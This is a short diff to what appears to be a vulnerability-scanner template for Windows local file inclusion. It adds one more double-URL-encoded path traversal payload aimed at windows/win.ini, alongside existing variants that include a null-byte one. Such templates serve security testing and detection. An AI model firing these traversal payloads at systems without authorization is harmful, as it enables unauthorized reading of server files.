--- a/lfi/windows-lfi-fuzz.yaml
+++ b/lfi/windows-lfi-fuzz.yaml
@@ -15,6 +15,7 @@ http:
       win_fuzz:
         - '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini'
         - '/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini'
+        - '/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini'
         - '\WINDOWS\win.ini'
         - '\WINDOWS\win.ini'
         - '\WINDOWS\win.ini%00'
